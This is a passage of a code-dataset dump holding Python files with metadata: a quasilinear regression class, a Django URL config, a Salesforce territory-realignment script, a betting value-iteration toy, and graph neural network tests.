"call"}, {"api_name": "sklearn.metrics", "line_number": 62, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 96, "usage_type": "attribute"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 108, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 108, "usage_type": "name"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 109, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 109, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 114, "usage_type": "call"}, {"api_name": "keras.layers.Embedding", "line_number": 115, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 116, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 117, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "90054734", "text": "from scipy import stats\nfrom enum import Enum\nimport numpy as np\nfrom collections import OrderedDict\nfrom stats.Distributions import stats as mystats\nfrom stats.Regressions.QuasilinearModels import *\nfrom stats.Regressions.LinearRegression import LinearRegression\nfrom stats.Regressions.AbstractRegression import AbstractRegression\n\ntry:\n\tfrom PyQt5 import QtCore\n\t_ = QtCore.QCoreApplication.translate\nexcept:\n\t_ = lambda cont, text: text\n\nMODELS = {\n\t2:\tSqrtModel,\n\t3:\tHyperbolicModel,\n\t4:\tInvLinearModel,\n\t5:\tXInvLinearModel,\n\t6:\tLnModel,\n\t7:\tPowModel,\n\t8:\tExpModel,\n\t9:\tCubicModel,\n\t10:\tExpInvModel,\n\t11: InvHyperbolicModel,\n\t12: InvExpModel\n}\n\nclass QLRM(Enum):\n\tSqrtModel = 2\n\tHyperbolicModel = 3\n\tInvLinearModel = 4\n\tXInvLinearModel = 5\n\tLnModel = 6\n\tPowModel = 7\n\tExpModel = 8\n\tCubicModel = 9\n\tExpInvModel = 10\n\tInvHyperbolicModel = 11\n\tInvExpModel = 12\n\nclass QuasilinearRegression(AbstractRegression):\n\tdef __init__(self, model=None):\n\t\tself._a = 0\n\t\tself._b = 0\n\t\tself._model = model\n\t\tif isinstance(model, QLRM):\n\t\t\tself._model = MODELS[model.value]\n\t\telif isinstance(model, int):\n\t\t\tself._model = MODELS[model]\n\n\tdef _init_linear_model(self, model):\n\t\tregr = LinearRegression()\n\t\tif isinstance(model, QLRM):\n\t\t\tmodel = MODELS[model.value]\n\t\telif isinstance(model, int):\n\t\t\tmodel = MODELS[model]\n\t\tif model == XInvLinearModel:\n\t\t\tpsi = model.psi(self._y, self._X)\n\t\telse:\n\t\t\tpsi = model.psi(self._y)\n\t\tphi = model.phi(self._X)\n\t\tregr.fit(phi, psi, 1 - self._gamma)\n\t\treturn regr\n\n\tdef _find_model(self):\n\t\tlinregressions = dict()\n\t\tfor i in MODELS.keys():\n\t\t\tlinregressions[i] = self._init_linear_model(MODELS[i])\n\t\tkv = 2\n\t\tSSR = linregressions[2].SSR()\n\t\tfor i in linregressions.keys():\n\t\t\tSSR1 = linregressions[i].SSR()\n\t\t\tif SSR1 < SSR:\n\t\t\t\tkv = i\n\t\t\t\tSSR = SSR1\n\t\tself._model = MODELS[kv]\n\n\tdef _fit(self, X, y, alpha=0.05):\n\t\ta = 0\n\t\tb = 0\n\t\tself._X = X\n\t\tself._y = y\n\t\tself._gamma = 1 - alpha\n\t\tif self._model is None:\n\t\t\tself._find_model()\n\t\tphi = self._model.phi(X)\n\t\targs = [y]\n\t\tif self._model == XInvLinearModel:\n\t\t\targs.append(X)\n\t\tpsi = self._model.psi(*args)\n\t\tlinreg = LinearRegression()\n\t\tlinreg.fit(phi, psi, 1 - self._gamma)\n\t\tB, A = linreg.get_params()\n\t\tself._a = A\n\t\tself._b = B\n\t\treturn self\n\n\tdef _get_psi(self, model):\n\t\ty = self._y\n\t\tX = self._X\n\t\targs = [y]\n\t\tif model == XInvLinearModel:\n\t\t\targs.append(X)\n\t\tpsi = model.psi(*args)\n\t\treturn psi\n\n\tdef _get_params(self):\n\t\treturn (self._a, self._b)\n\n\tdef _get_paramsdict(self):\n\t\tX = self._X\n\t\ty = self._y\n\t\tphi = self._model.phi(X)\n\t\targs = [y]\n\t\tif self._model == XInvLinearModel:\n\t\t\targs.append(X)\n\t\tpsi = self._model.psi(*args)\n\t\tlinreg = LinearRegression()\n\t\tlinreg.fit(phi, psi, 1 - self._gamma)\n\t\ttests = linreg.get_paramsdict()\n\t\treturn tests\n\n\tdef _predict(self, X):\n\t\tN = X.shape[0]\n\t\tphi = self._model.phi(X)\n\t\tA = self._a\n\t\tB = self._b\n\t\ty = A + B * phi\n\t\tif self._model in [MODELS[7], MODELS[8], MODELS[10]]:\n\t\t\ty = np.exp(y)\n\t\telif self._model in [MODELS[4], MODELS[11], MODELS[12]]:\n\t\t\ty = 1 / y\n\t\telif self._model in [MODELS[5]]:\n\t\t\ty = y / X\n\t\t\ty = 1 / y\n\t\telif self._model in [MODELS[2]]:\n\t\t\ty = np.sqrt(y)\n\t\treturn y\n\n\tdef _plot(self, ax):\n\t\tself.plotRegressionLine(ax)\n\t\t#self.plotConfidentInterval(ax)\n\t\t#self.plotTolerantBounds(ax)\n\n\tdef _plotRegressionLine(self, ax=None):\n\t\tX = np.linspace(self._X.min(), self._X.max(), self._X.shape[0])\n\t\ty = self.predict(X)\n\t\tlabel = _(\"QuasilinearRegression\", \"Quasilinear regression\")\n\t\tax.plot(X, y, \"g-\", lw=3, label=label)\n\n\tdef _plotConfidentInterval(self, ax):\n\t\tX = np.linspace(self._X.min(), self._X.max(), self._X.shape[0])\n\t\ty = self.predict(X)\n\t\tintercept = self._a\n\t\tslope = self._b\n\t\tN = self._X.shape[0]\n\t\tphi = self._model.phi(X)\n\t\tif self._model == XInvLinearModel:\n\t\t\tpsi = self._model.psi(y, X)\n\t\telse:\n\t\t\tpsi = self._model.psi(y)\n\t\tt = stats.t.ppf(0.5 - self._gamma / 2, N - 2)\n\t\tx0, Syx0 = mystats.var_y_x(phi, psi, intercept, slope)\n\t\tadd = t * Syx0\n\t\tax.plot(X, y + add, \"k-\", lw=2, label=_(\"2D\", \"Confidential intervals\"))\n\t\tax.plot(X, y - add, \"k-\", lw=2)\n\n\tdef _plotTolerantBounds(self, ax=None):\n\t\tX = np.linspace(self._X.min(), self._X.max(), self._X.shape[0])\n\t\tN = X.shape[0]\n\t\ty = self.predict(X)\n\t\tt = stats.t.ppf(0.5 - self._gamma / 2, N - 2)\n\t\tSSR = np.sqrt(self.SSR())\n\t\taddp = SSR * t\n\t\tprint(addp)\n\t\tprint(SSR)\n\t\tax.plot(X, y - addp, 'm-', lw=3, label=_(\"2D\", \"Tolerant bounds\"))\n\t\tax.plot(X, y + addp, 'm-', lw=3)\n\n\tdef _SSR(self):\n\t\tX = self._X\n\t\ty = self._y\n\t\tyx = self.predict(X)\n\t\tN = X.shape[0]\n\t\tSSR = np.sum(yx - y) / (N - 2)\n\t\treturn np.abs(SSR)\n\n\t@staticmethod\n\tdef rvs(model, **kwargs):\n\t\tif isinstance(model, QLRM):\n\t\t\tmodel = model.value\n\t\tif isinstance(model, int):\n\t\t\tmodel = MODELS[model]\n\t\tN = kwargs[\"N\"]\n\t\ta = kwargs[\"a\"]\n\t\tb = kwargs[\"b\"]\n\t\txmin = kwargs[\"xmin\"]\n\t\txmax = kwargs[\"xmax\"]\n\t\teps = stats.norm.rvs(loc=kwargs[\"o\"], scale=kwargs[\"sigm\"], size=N)\n\t\tx = np.random.uniform(xmin, xmax, N)\n\t\ty = model.y(x, a, b)\n\t\ty += eps\n\t\treturn np.array([x, y]).T\n\n\nif __name__ == '__main__':\n\timport seaborn as sns\n\tkwargs = {\n\t\t\"N\": 500,\n\t\t\"a\": 1,\n\t\t\"b\": 1,\n\t\t\"o\": 0,\n\t\t\"sigm\": 0.0001,\n\t\t\"xmax\": 10,\n\t\t\"xmin\": 0\n\t}\n\tmodel = ExpModel\n\tx, y = QuasilinearRegression.rvs(model, **kwargs).T\n\tregr = QuasilinearRegression()\n\tregr.fit(x, y)\n\tprint(regr._model)\n\tprint(regr.SSR())", "sub_path": "stats/Regressions/QuasilinearRegression.py", "file_name": "QuasilinearRegression.py", "file_ext": "py", "file_size_in_byte": 5273, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "PyQt5.QtCore.QCoreApplication", "line_number": 12, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 12, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 30, "usage_type": "name"}, {"api_name": "stats.Regressions.AbstractRegression.AbstractRegression", "line_number": 43, "usage_type": "name"}, {"api_name": "stats.Regressions.LinearRegression.LinearRegression", "line_number": 54, "usage_type": "call"}, {"api_name": "stats.Regressions.LinearRegression.LinearRegression", "line_number": 93, "usage_type": "call"}, {"api_name": "stats.Regressions.LinearRegression.LinearRegression", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.stats.t.ppf", "line_number": 164, "usage_type": "call"}, {"api_name": "scipy.stats.t", "line_number": 164, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 164, "usage_type": "name"}, {"api_name": "stats.Distributions.stats.var_y_x", "line_number": 165, "usage_type": "call"}, {"api_name": "stats.Distributions.stats", "line_number": 165, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 171, "usage_type": "call"}, {"api_name": "scipy.stats.t.ppf", "line_number": 174, "usage_type": "call"}, {"api_name": "scipy.stats.t", "line_number": 174, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 174, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 188, "usage_type": "call"}, {"api_name": "scipy.stats.norm.rvs", "line_number": 201, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 201, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 201, "usage_type": "name"}, {"api_name": "numpy.random.uniform", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 202, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 205, "usage_type": "call"}]}
+{"seq_id": "260673877", "text": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom apps.views import UserDetailView\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'SistemaDiscusiones.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^', include('apps.home.urls')),\n # url(r'^', include('apps.users.urls', namespace='users')),\n\n # Python social auth\n url('', include('social.apps.django_app.urls',namespace='social')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^usuario/(?P[-\\w]+)/', UserDetailView.as_view(), name='user_detail'),\n)\n", "sub_path": "SistemaDiscusiones/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 636, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 5, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 5, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 16, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "apps.views.UserDetailView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "apps.views.UserDetailView", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "305768720", "text": "import pandas as pd\r\nfrom files.dictionaries import vertMarkets, locSkills\r\nfrom common_functions import batches\r\nimport salesforce_login\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nimport datetime\r\nfrom tqdm import tqdm\r\nfrom simple_salesforce import SalesforceMalformedRequest\r\nimport time\r\nimport datetime\r\n\r\nnow = '-'.join('_'.join(str(datetime.datetime.now()).split('.')[0].split()).split(':'))\r\n\r\n\r\nsf = salesforce_login.bsna()\r\n\r\ndef realign(territory):\r\n\r\n\r\n territoryId = sf.query(f\"SELECT Id FROM Territory__c WHERE Name = '{territory}'\")['records'][0]['Id']\r\n\r\n skillSets = sf.query_all(f\"SELECT OwnerId,Skill_Set__c \\\r\n FROM Territory_SkillSet_Mapping__c WHERE Territory__r.Id = '{territoryId}' AND SkillSet_Object__c LIKE '%Account Location%'\")\r\n\r\n skillDict = {locSkills[x['Skill_Set__c']]:x['OwnerId'] for x in skillSets['records']}\r\n\r\n\r\n zips = sf.query_all(f\"SELECT Postal_Code__c FROM Postal_Code_Mapping__c WHERE Territory__c = '{territoryId}'\")\r\n zips = [x['Postal_Code__c'] for x in zips['records']]\r\n zipQuery = batches.likeBatch('Postal_Code__c', zips, 5000)\r\n\r\n def getLocations(zipQuery):\r\n\r\n loc_frames = []\r\n\r\n for query in zipQuery:\r\n\r\n security_locations = sf.query_all(f\"SELECT Associated_Location__r.Security_Owner__c,Associated_Location__r.Vertical_Market__c, \\\r\n Associated_Location__r.Vertical_Sub_Market__c, Associated_Location__c,Security_Business_ID__c \\\r\n FROM Associated_ERP_Account__c \\\r\n WHERE ({query}) AND (Associated_Location__r.Security_Owner__c != Null)\")\r\n security_locations = pd.DataFrame.from_records(security_locations['records'])\r\n loc_frames.append(security_locations)\r\n\r\n security_locations = pd.concat(loc_frames)\r\n\r\n return security_locations\r\n\r\n if len(zipQuery) == 0:\r\n return\r\n else:\r\n\r\n security_commercial = getLocations(zipQuery).groupby('Associated_Location__c').\\\r\n filter(lambda x : all(x['Security_Business_ID__c'].str.contains('Commercial'))).drop_duplicates('Associated_Location__c')\r\n\r\n security_commercial = pd.concat([security_commercial.drop(['Associated_Location__r'], axis=1),\\\r\n security_commercial['Associated_Location__r'].apply(pd.Series)], axis=1)\r\n\r\n def wrong_owner(locations):\r\n\r\n banking = locations[locations['Vertical_Market__c'].isin(vertMarkets[0])]\r\n banking.Security_Owner__c = skillDict['Security_Banking_Skill']\r\n\r\n education = locations[locations['Vertical_Market__c'].isin(vertMarkets[1])]\r\n education.Security_Owner__c = skillDict['Security_Education_Skill']\r\n\r\n slg = locations[locations['Vertical_Market__c'].isin(vertMarkets[2])]\r\n slg.Security_Owner__c = skillDict['Security_SLG_Skill']\r\n\r\n territory = locations[locations['Vertical_Market__c'].isin(vertMarkets[3])==False]\r\n territory.Security_Owner__c = skillDict['Security_TerritoryRep_Skill']\r\n\r\n wrong_owner = pd.concat([banking, education, slg, territory])[['Associated_Location__c','Security_Owner__c']]\r\n\r\n return wrong_owner\r\n\r\n updates = wrong_owner(security_commercial)\r\n updates = list(zip(updates['Associated_Location__c'], updates['Security_Owner__c']))\r\n\r\n return updates\r\n", "sub_path": "TRAMZ_2.0/compass_realignment.py", "file_name": "compass_realignment.py", "file_ext": "py", "file_size_in_byte": 3477, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "warnings.filterwarnings", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "attribute"}, {"api_name": "salesforce_login.bsna", "line_number": 16, "usage_type": "call"}, {"api_name": "files.dictionaries.locSkills", "line_number": 26, "usage_type": "name"}, {"api_name": "common_functions.batches.likeBatch", "line_number": 31, "usage_type": "call"}, {"api_name": "common_functions.batches", "line_number": 31, "usage_type": "name"}, {"api_name": "pandas.DataFrame.from_records", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 58, "usage_type": "attribute"}, {"api_name": "files.dictionaries.vertMarkets", "line_number": 62, "usage_type": "name"}, {"api_name": "files.dictionaries.vertMarkets", "line_number": 65, "usage_type": "name"}, {"api_name": "files.dictionaries.vertMarkets", "line_number": 68, "usage_type": "name"}, {"api_name": "files.dictionaries.vertMarkets", "line_number": 71, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 74, "usage_type": "call"}]}
+{"seq_id": "622328984", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('mathtutor', '0006_auto_20150929_0722'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='quiz',\n name='site',\n field=models.CharField(default=b'tutor', max_length=16, verbose_name=b'Website'),\n ),\n ]\n", "sub_path": "mathtutor/migrations/0007_quiz_site.py", "file_name": "0007_quiz_site.py", "file_ext": "py", "file_size_in_byte": 441, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "267710098", "text": "#%%\n\ngamma=1\np=0.4\nnumStates=100\nreward=[0 for _ in range(101)]\nreward[100]=1\n\ntheta=0.00000001\n\nimport matplotlib.pyplot as plt\nvalue=[0 for _ in range(101)]\npolicy=[0 for _ in range(101)]\n\ndef reinforcement_learning():\n delta=1\n while delta>theta:\n delta=0\n for i in range(1,numStates):\n oldValue=value[i]\n bellmanequation(i)\n diff=abs(oldValue-value[i])\n delta=max(delta,diff)\n plt.plot(value)\n plt.xlabel('Capital')\n plt.ylabel('Value Estimates')\n plt.title('Value function')\n\ndef bellmanequation(num):\n optimalvalue=0\n\n for bet in range(0,min(num,100-num)+1):\n win=num+bet\n loss=num-bet\n\n sum=p*(reward[win]+gamma*value[win])+(1-p)*(reward[loss]+gamma*value[loss])\n\n if sum>optimalvalue:\n optimalvalue=sum\n value[num]=sum\n policy[num]=bet\n\nreinforcement_learning() ", "sub_path": "sports_betting.py", "file_name": "sports_betting.py", "file_ext": "py", "file_size_in_byte": 916, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.plot", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}]}
+{"seq_id": "357896940", "text": "import pytest\nimport torch\nfrom torch.nn import Sequential, Linear, ReLU, Dropout\nimport torch.nn.functional as F\nfrom torch_geometric.nn import (GCNConv, GATConv, GNNExplainer,\n global_add_pool, MessagePassing)\n\n\nclass GCN(torch.nn.Module):\n def __init__(self):\n super(GCN, self).__init__()\n self.conv1 = GCNConv(3, 16)\n self.conv2 = GCNConv(16, 7)\n\n def forward(self, x, edge_index):\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n x = self.conv2(x, edge_index)\n return x.log_softmax(dim=1)\n\n\nclass GAT(torch.nn.Module):\n def __init__(self):\n super(GAT, self).__init__()\n self.conv1 = GATConv(3, 16, heads=2, concat=True)\n self.conv2 = GATConv(2 * 16, 7, heads=2, concat=False)\n\n def forward(self, x, edge_index):\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n x = self.conv2(x, edge_index)\n return x.log_softmax(dim=1)\n\n\n@pytest.mark.parametrize('model', [GCN(), GAT()])\ndef test_gnn_explainer(model):\n explainer = GNNExplainer(model, log=False)\n assert explainer.__repr__() == 'GNNExplainer()'\n\n x = torch.randn(8, 3)\n edge_index = torch.tensor([[0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7],\n [1, 0, 2, 1, 3, 2, 4, 3, 5, 4, 6, 5, 7, 6]])\n\n node_feat_mask, edge_mask = explainer.explain_node(2, x, edge_index)\n assert node_feat_mask.size() == (x.size(1), )\n assert node_feat_mask.min() >= 0 and node_feat_mask.max() <= 1\n assert edge_mask.size() == (edge_index.size(1), )\n assert edge_mask.min() >= 0 and edge_mask.max() <= 1\n\n\n@pytest.mark.parametrize('model', [GCN(), GAT()])\ndef test_to_log_prob(model):\n raw_to_log = GNNExplainer(model, return_type='raw').__to_log_prob__\n prob_to_log = GNNExplainer(model, return_type='prob').__to_log_prob__\n log_to_log = GNNExplainer(model, return_type='log_prob').__to_log_prob__\n\n raw = torch.tensor([[1, 3.2, 6.1], [9, 9, 0.1]])\n prob = raw.softmax(dim=-1)\n log_prob = raw.log_softmax(dim=-1)\n\n assert torch.allclose(raw_to_log(raw), prob_to_log(prob))\n assert torch.allclose(prob_to_log(prob), log_to_log(log_prob))\n\n\ndef assert_edgemask_clear(model):\n for layer in model.modules():\n if isinstance(layer, MessagePassing):\n assert ~layer.__explain__\n assert layer.__edge_mask__ is None\n\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = GCNConv(3, 16)\n self.conv2 = GCNConv(16, 16)\n self.fc1 = Sequential(Linear(16, 16), ReLU(), Dropout(0.2),\n Linear(16, 7))\n\n def forward(self, x, edge_index, batch, get_embedding=False):\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n x = self.conv2(x, edge_index)\n if get_embedding:\n return x\n x = global_add_pool(x, batch)\n x = self.fc1(x)\n return x.log_softmax(dim=1)\n\n\n@pytest.mark.parametrize('model', [Net()])\ndef test_graph_explainer(model):\n x = torch.randn(8, 3)\n edge_index = torch.tensor([[0, 1, 1, 2, 2, 3, 4, 5, 5, 6, 6, 7],\n [1, 0, 2, 1, 3, 2, 5, 4, 6, 5, 7, 6]])\n\n explainer = GNNExplainer(model, log=False)\n\n node_feat_mask, edge_mask = explainer.explain_graph(x, edge_index)\n assert_edgemask_clear(model)\n _, _ = explainer.visualize_subgraph(-1, edge_index, edge_mask,\n y=torch.tensor(2), threshold=0.8)\n assert node_feat_mask.size() == (x.size(1), )\n assert node_feat_mask.min() >= 0 and node_feat_mask.max() <= 1\n assert edge_mask.shape[0] == edge_index.shape[1]\n assert edge_mask.max() <= 1 and edge_mask.min() >= 0\n", "sub_path": "test/nn/models/test_gnn_explainer.py", "file_name": "test_gnn_explainer.py", "file_ext": "py", "file_size_in_byte": 3724, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "torch.nn", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 12, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.GATConv", "line_number": 25, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GATConv", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 30, "usage_type": "name"}, {"api_name": "torch_geometric.nn.GNNExplainer", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 41, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 35, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.GNNExplainer", "line_number": 53, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GNNExplainer", "line_number": 54, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GNNExplainer", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.allclose", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.allclose", "line_number": 62, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 51, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.MessagePassing", "line_number": 67, "usage_type": "argument"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 75, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 82, "usage_type": "name"}, {"api_name": "torch_geometric.nn.global_add_pool", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 94, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GNNExplainer", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 102, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 91, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 91, "usage_type": "attribute"}]}
+{"seq_id": "35612235", "text": "import numpy as np\nfrom numpy.testing import assert_allclose, assert_array_almost_equal\nimport pytest\nimport torch\n\nfrom openff.utilities import requires_package\nfrom openff.nagl.nn.activation import ActivationFunction\nfrom openff.nagl.nn.gcn import SAGEConvStack\nfrom openff.nagl.nn.gcn._sage import SAGEConv\n\ntry:\n import dgl\n\n _BASE_SAGECONV_CLASS = dgl.nn.pytorch.SAGEConv\nexcept ImportError:\n _BASE_SAGECONV_CLASS = SAGEConv\n\n\nclass TestDGLSAGEConvStack:\n def test_default_with_layers(self):\n stack = SAGEConvStack.with_layers(\n n_input_features=1,\n hidden_feature_sizes=[2, 3],\n )\n stack.reset_parameters()\n\n assert len(stack) == 2\n assert all(isinstance(layer, _BASE_SAGECONV_CLASS) for layer in stack)\n\n first, second = stack\n assert np.isclose(first.feat_drop.p, 0.0)\n assert first.fc_self.in_features == 1\n assert first.fc_self.out_features == 2\n\n assert np.isclose(second.feat_drop.p, 0.0)\n assert second.fc_self.in_features == 2\n assert second.fc_self.out_features == 3\n\n def test_with_layers_inputs(self):\n stack = SAGEConvStack.with_layers(\n n_input_features=2,\n hidden_feature_sizes=[3],\n layer_activation_functions=[ActivationFunction.LeakyReLU],\n layer_dropout=[0.5],\n layer_aggregator_types=[\"lstm\"],\n )\n\n assert len(stack) == 1\n assert all(isinstance(layer, _BASE_SAGECONV_CLASS) for layer in stack)\n\n layer = stack[0]\n assert np.isclose(layer.feat_drop.p, 0.5)\n assert layer.lstm.input_size == 2\n assert layer.lstm.hidden_size == 2\n assert layer.fc_neigh.out_features == 3\n assert isinstance(layer.activation, torch.nn.LeakyReLU)\n\n def test_forward(self, dgl_methane):\n stack = SAGEConvStack.with_layers(\n n_input_features=4,\n hidden_feature_sizes=[2],\n )\n\n h = stack.forward(dgl_methane.homograph, dgl_methane.atom_features)\n assert h.detach().numpy().shape == (5, 2)\n\n def test_invalid_lengths(self):\n expected_err = (\n r\"`layer_dropout` \\(length 1\\) must be a list of same length \"\n r\"as `hidden_feature_sizes` \\(length 2\\).\"\n )\n with pytest.raises(ValueError, match=expected_err):\n SAGEConvStack.with_layers(\n n_input_features=1,\n hidden_feature_sizes=[2, 3],\n layer_dropout=[0.5],\n )\n\n\nclass TestDGLSageConv:\n def test_forward_values(self, dgl_methane):\n dgl = pytest.importorskip(\"dgl\")\n layer = dgl.nn.pytorch.SAGEConv(\n in_feats=4,\n out_feats=3,\n aggregator_type=\"mean\",\n feat_drop=0,\n activation=torch.nn.Sigmoid(),\n bias=False,\n )\n\n layer.fc_neigh.weight.data.fill_(1.0)\n layer.fc_self.weight.data.fill_(2.0)\n\n expected_features = np.array(\n [\n [0, 0, 0, 1],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n [1, 0, 0, 